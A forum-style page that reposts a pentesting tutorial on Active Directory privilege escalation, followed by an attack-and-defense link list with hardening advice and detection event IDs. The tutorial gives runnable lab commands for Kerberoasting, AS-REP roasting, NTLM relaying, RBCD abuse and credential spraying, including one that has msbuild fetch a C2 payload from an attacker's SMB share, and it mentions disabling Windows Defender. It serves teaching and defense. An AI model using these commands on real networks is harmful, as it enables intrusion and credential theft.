Leaderboard

Pentru cei care va plictisiti si taiati frunze la caini: 1. Cu multumiri lui @jreister pentru pont, https://azure.microsoft.com/en-us/free/ pentru free credit 2. Tutoriale pdf pas cu pas - Build a Bot, Custom vision lab, Machine Learning Studio 3. Hands-on learning si alte materiale aditionale: 4. Materiale pentru Microsoft AI 5. Cursuri referitoare la cele de mai sus, structurate cum trebuie. Include si cybersecurity 6. AI Labs cu diferite experimente. Recomand de vazut cel cu JFK (utilizand Microsoft AI): Spor la treaba!

Penetration Testing Active Directory, Part II Hausec Infosec March 12, 2019 13 Minutes In the previous article, I obtained credentials to the domain three different ways. For most of this part of the series, I will use the rsmith user credentials, as they are low-level, forcing us to do privilege escalation. Privilege escalation in Windows can of course come from a missing patch or unquoted service paths, but since this is pentesting AD, we’re going to exploit some AD things in order to elevate privileges. With credentials to the network we now should do a little recon before we directly look to missing patch exploits. There’s a few tools and techniques that will help. Phase II: Privilege Escalation & Reconnaissance “Time spent on reconnaissance is seldom wasted.” – Arthur Wellesley Tool: Bloodhound One of my favorite tools is Bloodhound. Attackers think in graphs, so Bloodhound is an excellent tool because it literally maps out the domain in a graph, revealing relationships that are both intended and not intended. From an attacker perspective, this is interesting because it shows us targets. I wrote a whole thing on Bloodhound, which can be read here, but I’ll show a tl;dr version. Let’s assume you don’t have a session opened on a machine, but you have credentials. You can still use Bloodhound’s Python ingestor and remotely gather the data. It can in be installed via git git clone https://github.com/fox-it/BloodHound.py.git cd BloodHound.py/ && pip install . Then can be ran by passing in the credentials, domain, and DC IP bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all Once BH does it’s thing, it will store the data in the directory you ran it in, in .json format. Copy those files, then drag them into Bloodhound and you now have a pretty graph of the network. If you sort by “Shortest path to domain admin” you’ll get something similar to below AdminAlice is logged into a DC. The power of this is that you can directly see what administrators are logged into what machines, giving you a next target. In a domain of hundreds or maybe even thousands of machines that will accept low-privilege credentials, you don’t want to waste time by just gathering other low-priv creds. This gives a target list, among many other things. Other uses can include identifying SQL servers that might have databases containing credentials, identifying what machines can be RDP’d into, and so much more. I encourage you to read more about it’s capabilities in depth here. I also encourage you to look at GoFetch, which automatically utilizes an attack plan drawn out by Bloodhound. Attack: Kerberoasting | Tool: GetUserSPNs.py With a target list and a domain controller identified, one way of privilege escalation is Kerberoasting. Kerberoasting is possible because service accounts are issued a Service Principal Name (SPN) within AD. It is possible then for any user to request a Kerberos ticket from the SPN, which has that accounts hashed password (In Kerberos 5 TGS-REP format). There are many different tools that can do Kerberoasting, but really you only need one tool. GetUserSPNs.py is pretty self explanatory — it queries the target domain for SPNs that are running under a user account. Using it is pretty simple. And now we have the hash to a service account. I load it into hashcat (GUI, of course) and select hash type 13100, as highlighted below And it cracks within a few seconds We now have the credentials to a service account, which usually results in access to the domain controller. Too easy? Let’s try other ways. Attack: ASEPRoasting | Tool: Rubeus ASEPRoasting is similar to Kerberoasting in the sense that we query accounts for TGTs, get the hash, then crack it, however in the case of ASEPRoasting there’s a very big caveat: Kerberos pre-authentication must be disabled, which is not a default setting. When you request a TGT, via a Kerberos AS-REQ message, you also supply a timestamp that is encrypted with your username and password. The Key Distribution center (KDC) then decrypts the timestamp, verifies the request is coming from that user, then continues with the authentication process. This is the pre-authentication process for Kerberos, which is obviously a problem for an attacker because we aren’t the KDC and cannot decrypt that message. Of course, this is by design, to prevent attacks, however if pre-authentication is turned off, we can send an AS-REQ to any user which will return their hashed password in return. Since pre-auth is enabled by default, it has to be manually turned off, so this is rare, however still worth mentioning. tsmith is susceptible to ASREPRoasting because ‘Do not require Kerberos preauthentication’ is checked. To exploit this, we’ll use a tool called Rubeus. Rubeus is a massive toolset for abusing Kerberos, but for conducting ASREPRoasting, we care about this section. To use Rubeus, you first need to install Visual Studio. Once installed, download Rubeus and open the Rubeus.sln file with Visual studio. By default, it will install in the Rubeus\bin\Debug\ file. cd into that directory, then run it: .\Rubeus.exe asreproast If no users have ‘Do not require Kerberos preauthentication’ checked, then there won’t be any users to roast. But if there is… We then can get the hash for the user and crack it. Keep in mind that the examples were done on a computer already joined to the domain, so if you were doing this from a computer not on the domain, you would have to pass in the domain controller, domain name, OUs, etc. Tool: SILENTTRINITY SILENTTRINITY is a new Command and Control (C2) tool developed by @byt3bl33d3r which utilizes IronPython and C#. You have the option to use MSBuild.exe, a Windows binary which builds C# code (which is also installed by default with Windows 10, as part of .NET) to run a command & control (C2) payload in an XML format, allowing the attacker to then use the underlying .NET framework to do as they please on the victim’s machine via IronPython, C#, and other languages. Personally, SILENTTRINITY has replaced Empire in my toolkit and I wrote a guide on how to use it here. There’s still select areas where I’d prefer to have an Empire connection, but ST is also in an ‘alpha’ state, so that functionality will come. There’s three main reasons why ST has replaced Empire, in my opinion. Empire payloads are now being caught by Windows Defender, even when obfuscated (there’s ways around it, but still.) ST lives off the land You can elevate to SYSTEM privileges when executing the payload over CME with the –at-exec switch. Below is a PoC in a fresh Windows 10 install, using a non-Domain Admin user’s credentials Account “tsmith” is only in the user’s group Code execution with tsmith’s credentials I generate the XML payload in SILENTTRINITY, then host it on my SMB server via smbserver.py. If you’re confused on how to do that, follow my guide here. I then use CME to execute the command that will fetch the XML file on my attacker machine. crackmapexec 192.168.218.60 -u tsmith -p Password! -d lab.local -x 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe \\192.168.218.129\SMB\msbuild.xml' --exec-method atexec CME executes the supplied command, which runs msbuild.exe and tells it to build the XML file hosted on my SMB server I now have a session opened in ST And listing the info for the session reveals my username is SYSTEM, meaning I escalated from user tsmith to SYSTEM, due to the fact that MSBuild.exe ran with the –exec-method atexec option, which uses Task Scheduler with SYSTEM privileges (or whatever the highest possible it) to run the command. And of course, we then dump credentials and now have an administrator password hash which we can pass or crack. Attack: PrivExchange PrivExchange is a new technique (within the past month) that takes advantage of the fact that Exchange servers are over-permissioned by default. This was discovered by Dirkjann a little over a month ago and is now an excellent way of quickly escalating privileges. It works by querying the Exchange server, getting a response back that contains the Exchange server’s credentials, then relaying the credentials in the response to the Domain Controller via ntlmrelayx, then modifying a user’s privileges so they can dump the hashes on the domain controller. Setting this up was kind of a pain. Exchange 2013 is installed using the default methods on a Windows 2012 R2 server, and I made this modification to the PrivExchange python script to get it to work without a valid SSL certificate. After that, it ran fine. First, start ntlmrelayx.py and point it to a DC, authenticate via LDAP and escalate privileges for a user. ntlmrelayx.py -t ldap://192.168.218.10 --escalate-user rsmith Then, run privexchange.py by passing in your attacker IP (-ah), the target, and user/password/domain. python privexchange.py -ah 192.168.218.129 LAB2012DC02.lab.local -u rsmith -d lab.local -p Winter201 Privexchange.py makes the API call to the echange ntlmrelayx relays the Exchange server’s credentials to the Master DC, then escalates rsmith’s privileges Using rsmith’s privileges to dump the hashes on the DC. With the hashes to all users, they can now be cracked. Side note: If you ever run Mimikatz and it gets caught by AV, secretsdump.py is an excellent alternative, as it doesn’t drop anything to disk. Attack: Kerberos Unconstrained Delegation Also from Dirk-jan, is an attack that takes advantage of default AD installs. Specifically, the fact that computers can, by default, change some attributes relating to their permissions such as msDS-AllowedToActOnBehalfOfOtherIdentity. This attribute controls whether users can login to (almost) any computer on the domain via Kerberos impersonation. This is all possible through relaying credentials. I’ve demonstrated mitm6 in part one, so I’ll use it again here, but relay the responses in a different way. mitm6 -i ens33 -d lab.local I then serve the WPAD file and relay the credentials over LDAPS to the primary DC while choosing the delegate access attack method. ntlmrelayx.py -t ldaps://LAB2012DC01.lab.local -wh 192.168.10.100 --delegate-access The victim opens IE, which sends out a WPAD request over IPv6, which the attacker (me) responds to and relays those credentials to the DC over LDAPS. A new computer is created and the delegation rights are modified so that the new ‘computer’ can impersonate any user on LABWIN10 (the victim) via the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. So I now generate a silver ticket and impersonate the user ‘Administrator’. getST.py -spn cifs/LABWIN10.lab.local lab.local/AFWMZ0DS\$ -dc-ip 192.168.10.10 -impersonate Administrator I then logon to LABWIN10 with my silver ticket via secretsdump.py and dump the credentials. To read more on silver ticket attacks and how they work, this is a good article. Attack: Resource-based Constrained Delegation Yes, more attacks due to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. @harmj0y made a post a few weeks ago on this. Essentially, if you’re able to change a computer object in AD, you can take over the computer itself. The only catch to this is there needs to be one 2012+ domain controller, as older versions do not support resource-based constrained delegation (RBCD). Elad Shamir breaks the entire attack down, including more about RBCD, in this article. There’s three tools used for this: Powermad Powerview Rubeus This attack is then conducted on the Windows 10 machine with rsmith’s credentials. First, we set the executionpolicy to bypass so we can import and run scripts. Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser Then we check to see if we can modify discretionary access control lists (DACLs). $AttackerSID = Get-DomainGroup Users -Properties objectsid | Select -Expand objectsid Get-DomainObjectACL LAB2012DC01.lab.local | ?{$_.SecurityIdentifier -match $AttackerSID} The above commands look up rights for the ‘Users’ SID, showing that the group has ‘Generate Write’ permissions on the object (the DC). By default, this isn’t exploitable. This is abusing a potential misconfiguration an Administrator made; in this example it is the fact that the Admin added the “Users” group as a principal to the DC and allowed the GenericWrite attribute. As a PoC, rsmith (who is in the “Users” group), cannot get into the DC. What we do next is create a new computer account and modify the property on the domain controller to allow the new computer account to pretend to be anyone to the domain controller, all thanks to the msDS-allowedToActOnBehalfOfOtherIdentity. It’s possible for us to create a new computer account, because by default a user is allowed to create up to 10 machine accounts. Powermad has a function for it New-MachineAccount -MachineAccount hackermachine -Password $(ConvertTo-SecureString 'Spring2017' -AsPlainText -Force) We then add the new machine’s SID to the msDS-allowedToActOnBehalfOfOtherIdentity attribute on the DC. $ComputerSid = Get-DomainComputer hackermachine -Properties objectsid | Select -Expand objectsid $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" $SDBytes = New-Object byte $SD.GetBinaryForm($SDBytes, 0) Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} Then use Rubeus to get the NT password for our created machine. .\Rubeus.exe hash /password:Spring2017 /user:hackermachine /domain:lab.local Finally, we then impersonate a domain administrator (Administrator) using Rubeus’ service for user (S4U) process on the target DC. .\Rubeus.exe s4u /user:hackermachine$ /rc4:9EFAFD86A2791ED001085B4F878AF381 /impersonateuser:Administrator /msdsspn:cifs/LAB2012DC01.lab.local /ptt With the ticket imported, we can then access the domain controller. Again, this is leveraging the fact that the system administrator dun goofed and added the ‘Users’ group to have Generic_Write access to the DC. Even though we couldn’t access it via SMB, we modified the permissions that would allow us to. If you’re still confused, here’s a video from SpecterOps demonstrating a walkthrough. Attack: MS14-025, GPP This one is less common as it’s been out for quite some time, however it gets a mention because it still does exist. MS14-025 is also known as the group policy preferences escalation vulnerability. When a Domain Administrator would push out a local administrator account via Group Policy Preferences, it would store the encrypted credentials in the SYSVOL share on the domain controller (SYSVOL is accessible by anyone, as it’s where policies are stored and other things domain clients need to access). This typically wouldn’t be a problem because it’s encrypted with AES encryption, right? Well, Microsoft dun goofed and published the decryption key. So now, attackers can decode the password. To simplify things, Metasploit has an auxiliary module for this. Attack: Finding over privileged accounts | Tool: CrackMapExec Ok, this one isn’t necessarily an “attack” as much as it is a methodology of doing good reconnaissance and enumeration, which a few tools can help out with. This seems like kinda of a stretch from an article standpoint, but in reality over privileged accounts are so incredibly common, that it’s not unusual to find one persons accounts then log into another persons workstation and have read access to their stuff. In addition, having privileges to servers where that user should have no business accessing, which of course leads to the attacker just dumping credentials everywhere and eventually finding creds that work on the domain controller. The methodology here is pretty easy: Spray the credentials across the network, see what you can log into. With crackmapexec, you can list the shares and see what you have write access to. crackmapexec 192.168.218.0/24 -u rsmith -p Winter2017 --shares From here, use SILENTTRINITY to get a session open on what the user has write access to, run the mimikatz module, and hope you find new credentials that are privileged. Remember, you can use CME with CIDRs, meaning if you’re using SILENTTRINITY as your C2 server and using CME to trigger the connection, you can spray that across the network for maximum sessions. Although it’s not very OpSec friendly and quite noisy. Consider it a test to see how their detection and response posture is Tools: PowerTools Suite Attack 1: Finding passwords in files. Another thing to look for is passwords in files. There’s been several occasions where I find a user is storing emails in their Documents folder, which contains a password. Or they keep an Excel/Word file with passwords in it. This is where the PowerSploit suite comes in handy. Where do I begin with the PowerSploit suite…basically if you want to do something malicious, there’s a Powershell module for it. In the case of searching for passwords, or any string for that matter, PowerView is your friend. Keep in mind EDRs catch basically every module in this suite, so I suggest encoding them before using via Invoke-Obfuscation. PowerView is easy to use. Download the PowerSploit suite, and open Powershell in the directory you’ve extracted it in (make sure you’re admin). First, allow scripts to be ran. Set-ExecutionPolicy Bypass Then import the module Import-Module .\PowerView.ps1 In the PowerView module is a command called Invoke-FileFinder, which allows you to search for files or in files for any string you want. Consider the string ‘password’. Search the C drive for anything containing the string ‘password’ Found a secret password file! Just be mindful that this takes a very long time. It helps to narrow the search area down and running the command from that directory. Attack 2: Get-ExploitableSystem This is a pretty self-explanatory script. It will query Active Directory for the hostname, OS version, and service pack level for each computer account, then cross-referenced against a list of common Metasploit exploits. First import the whole PowerSploit suite (Or just PowerView if you want) Import-Module .\PowerSploit.psd1 Then run the command Get-ExploitableSystem -Verbose Hurray for Windows XP! Attack 3: PowerUp In the PowerUp module is a function called “Invoke-All-Checks” which does exactly what it says it does. It checks for everything, from unquoted service paths (which I wrote on how to exploit here) to looking for MS14-025, it does a lot. Look at the Github for more info. Using it is simple Invoke-AllChecks Thanks MSI. Attack 4: GetSystem This module does the same thing the Metasploit ‘GetSystem’ function does. To find out more about what exactly that entails, read this excellent post by CobaltStrike. Otherwise, just run the command. Get-System -Technique Token or Get-System -ServiceName 'PrivescSvc' -PipeName 'secret' I am just a lonely Admin. I am SYSTEM! Tool(s): ADAPE Personally, I wrote one called ADAPE – The Active Directory Assessment and Privilege Escalation script ADAPE is written in Powershell and uses several different other tool’s functions and runs them automatically, preventing the need to port over multiple tools. It’s also obfuscated and turns off Windows Defender to help bypass EDR. ADAPE is meant to be easy to use. Download it, port it over to your target Windows Machine, and run it PowerShell.exe -ExecutionPolicy Bypass ./ADAPE.ps1 Since all the necessary scripts are included, it doesn’t need to reach out to the internet and will store the results in a capture.zip file that can be exported. Error messages are normal, unless it breaks. Then report. Looking for GPP passwords, Kerberoasting, and running Bloodhound ingestor Checking for privesc, then deleting the files it made and zipping up the capture file. If you open up the capture file, you’ll have all the results. Again, by all means, this is not comprehensive. This is just a few tools and attacks I’ve used successfully over the years, so there’s a good chance at least one of these works. In part III, I will go over post-exploitation and persistence. Resources and References: I take no credit for the discovery of any of these techniques, I’m just the dude that makes an article about the ones I like to use. Massive thank you to @harmj0y, @cptjesus, @_wald0, and the rest of the team at SpecterOps for the amazing research they do as well as creation of several excellent tools. Thank you to the Bloodhound Slack for answering my question. Thank you @byt3bl33d3r and the team at Black Hills InfoSec for the research and tools they make. Thank you @_dirkjan and the team at Fox-it for the research and tools. Thank you secureauth for impacket, a staple in every pentesters tool kit. Sursa: https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/

Active Directory Kill Chain Attack & Defense Summary This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention. And understand Active Directory Kill Chain Attack and Modern Post Exploitation Adversary Tradecraft Activity. Table of Contents Discovery Privilege Escalation Defense Evasion Credential Dumping Lateral Movement Persistence Defense & Detection Discovery SPN Scanning SPN Scanning – Service Discovery without Network Port Scanning Active Directory: PowerShell script to list all SPNs used Discovering Service Accounts Without Using Privileges Data Mining A Data Hunting Overview Push it, Push it Real Good Finding Sensitive Data on Domain SQL Servers using PowerUpSQL Sensitive Data Discovery in Email with MailSniper Remotely Searching for Sensitive Files User Hunting Hidden Administrative Accounts: BloodHound to the Rescue Active Directory Recon Without Admin Rights Gathering AD Data with the Active Directory PowerShell Module Using ActiveDirectory module for Domain Enumeration from PowerShell Constrained Language Mode PowerUpSQL Active Directory Recon Functions Derivative Local Admin Dumping Active Directory Domain Info – with PowerUpSQL! Local Group Enumeration Attack Mapping With Bloodhound Situational Awareness Commands for Domain Network Compromise A Pentester’s Guide to Group Scoping LAPS Microsoft LAPS Security & Active Directory LAPS Configuration Recon Running LAPS with PowerView RastaMouse LAPS Part 1 & 2 AppLocker Enumerating AppLocker Config Privilege Escalation Passwords in SYSVOL & Group Policy Preferences Finding Passwords in SYSVOL & Exploiting Group Policy Preferences Pentesting in the Real World: Group Policy Pwnage MS14-068 Kerberos Vulnerability MS14-068: Vulnerability in (Active Directory) Kerberos Could Allow Elevation of Privilege Digging into MS14-068, Exploitation and Defence From MS14-068 to Full Compromise – Step by Step DNSAdmins Abusing DNSAdmins privilege for escalation in Active Directory From DNSAdmins to Domain Admin, When DNSAdmins is More than Just DNS Administration Unconstrained Delegation Domain Controller Print Server + Unconstrained Kerberos Delegation = Pwned Active Directory Forest Active Directory Security Risk #101: Kerberos Unconstrained Delegation (or How Compromise of a Single Server Can Compromise the Domain) Unconstrained Delegation Permissions Trust? Years to earn, seconds to break Hunting in Active Directory: Unconstrained Delegation & Forests Trusts Constrained Delegation Another Word on Delegation From Kekeo to Rubeus S4U2Pwnage Kerberos Delegation, Spns And More... Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory Insecure Group Policy Object Permission Rights Abusing GPO Permissions A Red Teamer’s Guide to GPOs and OUs File templates for GPO Abuse GPO Abuse - Part 1 Insecure ACLs Permission Rights Exploiting Weak Active Directory Permissions With Powersploit Escalating privileges with ACLs in Active Directory Abusing Active Directory Permissions with PowerView BloodHound 1.3 – The ACL Attack Path Update Scanning for Active Directory Privileges & Privileged Accounts Active Directory Access Control List – Attacks and Defense aclpwn - Active Directory ACL exploitation with BloodHound Domain Trusts A Guide to Attacking Domain Trusts It's All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts Active Directory forest trusts part 1 - How does SID filtering work? The Forest Is Under Control. Taking over the entire Active Directory forest Not A Security Boundary: Breaking Forest Trusts The Trustpocalypse DCShadow Privilege Escalation With DCShadow DCShadow DCShadow explained: A technical deep dive into the latest AD attack technique DCShadow - Silently turn off Active Directory Auditing DCShadow - Minimal permissions, Active Directory Deception, Shadowception and more RID Rid Hijacking: When Guests Become Admins Microsoft SQL Server How to get SQL Server Sysadmin Privileges as a Local Admin with PowerUpSQL Compromise With Powerupsql – Sql Attacks Red Forest Attack and defend Microsoft Enhanced Security Administrative Exchange Exchange-AD-Privesc Abusing Exchange: One API call away from Domain Admin NtlmRelayToEWS NTML Relay Pwning with Responder – A Pentester’s Guide Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes) Relaying credentials everywhere with ntlmrelayx Lateral Movement Microsoft SQL Server Database links SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! SQL Server Link Crawling with PowerUpSQL Pass The Hash Performing Pass-the-hash Attacks With Mimikatz How to Pass-the-Hash with Mimikatz Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy System Center Configuration Manager (SCCM) Targeted Workstation Compromise With Sccm PowerSCCM - PowerShell module to interact with SCCM deployments WSUS Remote Weaponization of WSUS MITM WSUSpendu Leveraging WSUS – Part One Password Spraying Password Spraying Windows Active Directory Accounts - Tradecraft Security Weekly #5 Attacking Exchange with MailSniper A Password Spraying tool for Active Directory Credentials by Jacob Wilkin Automated Lateral Movement GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application DeathStar - Automate getting Domain Admin using Empire ANGRYPUPPY - Bloodhound Attack Path Automation in CobaltStrike Defense Evasion In-Memory Evasion Bypassing Memory Scanners with Cobalt Strike and Gargoyle In-Memory Evasions Course Bring Your Own Land (BYOL) – A Novel Red Teaming Technique Endpoint Detection and Response (EDR) Evasion Red Teaming in the EDR age Sharp-Suite - Process Argument Spoofing OPSEC Modern Defenses and YOU! OPSEC Considerations for Beacon Commands Red Team Tradecraft and TTP Guidance Fighting the Toolset Microsoft ATA & ATP Evasion Red Team Techniques for Evading, Bypassing, and Disabling MS Advanced Threat Protection and Advanced Threat Analytics Red Team Revenge - Attacking Microsoft ATA Evading Microsoft ATA for Active Directory Domination PowerShell ScriptBlock Logging Bypass PowerShell ScriptBlock Logging Bypass PowerShell Anti-Malware Scan Interface (AMSI) Bypass How to bypass AMSI and execute ANY malicious Powershell code AMSI: How Windows 10 Plans to Stop Script-Based Attacks AMSI Bypass: Patching Technique Invisi-Shell - Hide your Powershell script in plain sight. Bypass all Powershell security features Loading .NET Assemblies Anti-Malware Scan Interface (AMSI) Bypass A PoC function to corrupt the g_amsiContext global variable in clr.dll in .NET Framework Early Access build 3694 AppLocker & Device Guard Bypass Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts) Sysmon Evasion Subverting Sysmon: Application of a Formalized Security Product Evasion Methodology sysmon-config-bypass-finder HoneyTokens Evasion Forging Trusts for Deception in Active Directory Honeypot Buster: A Unique Red-Team Tool Disabling Security Tools Invoke-Phant0m - Windows Event Log Killer Credential Dumping NTDS.DIT Password Extraction How Attackers Pull the Active Directory Database (NTDS.dit) from a Domain Controller Extracting Password Hashes From The Ntds.dit File SAM (Security Accounts Manager) Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS Kerberoasting Kerberoasting Without Mimikatz Cracking Kerberos TGS Tickets Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory Domain Extracting Service Account Passwords With Kerberoasting Cracking Service Account Passwords with Kerberoasting Kerberoast PW list for cracking passwords with complexity requirements Kerberos AP-REP Roasting Roasting AS-REPs Windows Credential Manager/Vault Operational Guidance for Offensive User DPAPI Abuse Jumping Network Segregation with RDP DCSync Mimikatz and DCSync and ExtraSids, Oh My Mimikatz DCSync Usage, Exploitation, and Detection Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync LLMNR/NBT-NS Poisoning LLMNR/NBT-NS Poisoning Using Responder Other Compromising Plain Text Passwords In Active Directory Persistence Golden Ticket Golden Ticket Kerberos Golden Tickets are Now More Golden SID History Sneaky Active Directory Persistence #14: SID History Silver Ticket How Attackers Use Kerberos Silver Tickets to Exploit Systems Sneaky Active Directory Persistence #16: Computer Accounts & Domain Controller Silver Tickets DCShadow Creating Persistence With Dcshadow AdminSDHolder Sneaky Active Directory Persistence #15: Leverage AdminSDHolder & SDProp to (Re)Gain Domain Admin Rights Persistence Using Adminsdholder And Sdprop Group Policy Object Sneaky Active Directory Persistence #17: Group Policy Skeleton Keys Unlocking All The Doors To Active Directory With The Skeleton Key Attack Skeleton Key Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers & BackDoor Your Active Directory Forest SeEnableDelegationPrivilege The Most Dangerous User Right You (Probably) Have Never Heard Of SeEnableDelegationPrivilege Active Directory Backdoor Security Support Provider Sneaky Active Directory Persistence #12: Malicious Security Support Provider (SSP) Directory Services Restore Mode Sneaky Active Directory Persistence #11: Directory Service Restore Mode (DSRM) Sneaky Active Directory Persistence #13: DSRM Persistence v2 ACLs & Security Descriptors An ACE Up the Sleeve: Designing Active Directory DACL Backdoors Shadow Admins – The Stealthy Accounts That You Should Fear The Most The Unintended Risks of Trusting Active Directory Tools & Scripts PowerView - Situational Awareness PowerShell framework BloodHound - Six Degrees of Domain Admin Impacket - Impacket is a collection of Python classes for working with network protocols aclpwn.py - Active Directory ACL exploitation with BloodHound CrackMapExec - A swiss army knife for pentesting networks ADACLScanner - A tool with GUI or command linte used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory zBang - zBang is a risk assessment tool that detects potential privileged account threats PowerUpSQL - A PowerShell Toolkit for Attacking SQL Server Rubeus - Rubeus is a C# toolset for raw Kerberos interaction and abuses ADRecon - A tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment Mimikatz - Utility to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory but also perform pass-the-hash, pass-the-ticket or build Golden tickets Grouper - A PowerShell script for helping to find vulnerable settings in AD Group Policy. Ebooks The Dog Whisperer’s Handbook – A Hacker’s Guide to the BloodHound Galaxy Varonis eBook: Pen Testing Active Directory Environments Cheat Sheets Tools Cheat Sheets - Tools (PowerView, PowerUp, Empire, and PowerSploit) DogWhisperer - BloodHound Cypher Cheat Sheet (v2) PowerView-3.0 tips and tricks PowerView-2.0 tips and tricks Defense & Detection Tools & Scripts SAMRi10 - Hardening SAM Remote Access in Windows 10/Server 2016 Net Cease - Hardening Net Session Enumeration PingCastle - A tool designed to assess quickly the Active Directory security level with a methodology based on risk assessment and a maturity framework Aorato Skeleton Key Malware Remote DC Scanner - Remotely scans for the existence of the Skeleton Key Malware Reset the krbtgt account password/keys - This script will enable you to reset the krbtgt account password and related keys while minimizing the likelihood of Kerberos authentication issues being caused by the operation Reset The KrbTgt Account Password/Keys For RWDCs/RODCs Deploy-Deception - A PowerShell module to deploy active directory decoy objects dcept - A tool for deploying and detecting use of Active Directory honeytokens LogonTracer - Investigate malicious Windows logon by visualizing and analyzing Windows event log DCSYNCMonitor - Monitors for DCSYNC and DCSHADOW attacks and create custom Windows Events for these events Active Directory Security Checks (by Sean Metcalf - @Pyrotek3) General Recommendations Manage local Administrator passwords (LAPS). Implement RDP Restricted Admin mode (as needed). Remove unsupported OSs from the network. Monitor scheduled tasks on sensitive systems (DCs, etc.). Ensure that OOB management passwords (DSRM) are changed regularly & securely stored. Use SMB v2/v3+ Default domain Administrator & KRBTGT password should be changed every year & when an AD admin leaves. Remove trusts that are no longer necessary & enable SID filtering as appropriate. All domain authentications should be set (when possible) to: "Send NTLMv2 response onlyrefuse LM & NTLM." Block internet access for DCs, servers, & all administration systems. Protect Admin Credentials No "user" or computer accounts in admin groups. Ensure all admin accounts are "sensitive & cannot be delegated". Add admin accounts to "Protected Users" group (requires Windows Server 2012 R2 Domain Controllers, 2012R2 DFL for domain protection). Disable all inactive admin accounts and remove from privileged groups. Protect AD Admin Credentials Limit AD admin membership (DA, EA, Schema Admins, etc.) & only use custom delegation groups. ‘Tiered’ Administration mitigating credential theft impact. Ensure admins only logon to approved admin workstations & servers. Leverage time-based, temporary group membership for all admin accounts Protect Service Account Credentials Limit to systems of the same security level. Leverage “(Group) Managed Service Accounts” (or PW >20 characters) to mitigate credential theft (kerberoast). Implement FGPP (DFL =>2008) to increase PW requirements for SAs and administrators. Logon restrictions – prevent interactive logon & limit logon capability to specific computers. Disable inactive SAs & remove from privileged groups. Protect Resources Segment network to protect admin & critical systems. Deploy IDS to monitor the internal corporate network. Network device & OOB management on separate network. Protect Domain Controllers Only run software & services to support AD. Minimal groups (& users) with DC admin/logon rights. Ensure patches are applied before running DCPromo (especially MS14-068 and other critical patches). Validate scheduled tasks & scripts. Protect Workstations (& Servers) Patch quickly, especially privilege escalation vulnerabilities. Deploy security back-port patch (KB2871997). Set Wdigest reg key to 0 (KB2871997/Windows 8.1/2012R2+): HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProvidersWdigest Deploy workstation whitelisting (Microsoft AppLocker) to block code exec in user folders – home dir & profile path. Deploy workstation app sandboxing technology (EMET) to mitigate application memory exploits (0-days). Logging Enable enhanced auditing “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” Enable PowerShell module logging (“*”) & forward logs to central log server (WEF or other method). Enable CMD Process logging & enhancement (KB3004375) and forward logs to central log server. SIEM or equivalent to centralize as much log data as possible. User Behavioural Analysis system for enhanced knowledge of user activity (such as Microsoft ATA). Security Pro’s Checks Identify who has AD admin rights (domain/forest). Identify who can logon to Domain Controllers (& admin rights to virtual environment hosting virtual DCs). Scan Active Directory Domains, OUs, AdminSDHolder, & GPOs for inappropriate custom permissions. Ensure AD admins (aka Domain Admins) protect their credentials by not logging into untrusted systems (workstations). Limit service account rights that are currently DA (or equivalent). Detection Attack Event ID Account and Group Enumeration 4798: A user's local group membership was enumerated 4799: A security-enabled local group membership was enumerated AdminSDHolder 4780: The ACL was set on accounts which are members of administrators groups Kekeo 4624: Account Logon 4672: Admin Logon 4768: Kerberos TGS Request Silver Ticket 4624: Account Logon 4634: Account Logoff 4672: Admin Logon Golden Ticket 4624: Account Logon 4672: Admin Logon PowerShell 4103: Script Block Logging 400: Engine Lifecycle 403: Engine Lifecycle 4103: Module Logging 600: Provider Lifecycle DCShadow 4742: A computer account was changed 5137: A directory service object was created 5141: A directory service object was deleted 4929: An Active Directory replica source naming context was removed Skeleton Keys 4673: A privileged service was called 4611: A trusted logon process has been registered with the Local Security Authority 4688: A new process has been created 4689: A new process has exited PYKEK MS14-068 4672: Admin Logon 4624: Account Logon 4768: Kerberos TGS Request Kerberoasting 4769: A Kerberos ticket was requested S4U2Proxy 4769: A Kerberos ticket was requested Lateral Movement 4688: A new process has been created 4689: A process has exited 4624: An account was successfully logged on 4625: An account failed to log on DNSAdmin 770: DNS Server plugin DLL has been loaded 541: The setting serverlevelplugindll on scope . has been set to <dll path> 150: DNS Server could not load or initialize the plug-in DLL DCSync 4662: An operation was performed on an object Password Spraying 4625: An account failed to log on 4771: Kerberos pre-authentication failed 4648: A logon was attempted using explicit credentials Resources ASD Strategies to Mitigate Cyber Security Incidents Reducing the Active Directory Attack Surface Securing Domain Controllers to Improve Active Directory Security Securing Windows Workstations: Developing a Secure Baseline Implementing Secure Administrative Hosts Privileged Access Management for Active Directory Domain Services Awesome Windows Domain Hardening Best Practices for Securing Active Directory Introducing the Adversary Resilience Methodology — Part One Introducing the Adversary Resilience Methodology — Part Two Mitigating Pass-the-Hash and Other Credential Theft, version 2 Configuration guidance for implementing the Windows 10 and Windows Server 2016 DoD Secure Host Baseline settings Monitoring Active Directory for Signs of Compromise Detecting Lateral Movement through Tracking Event 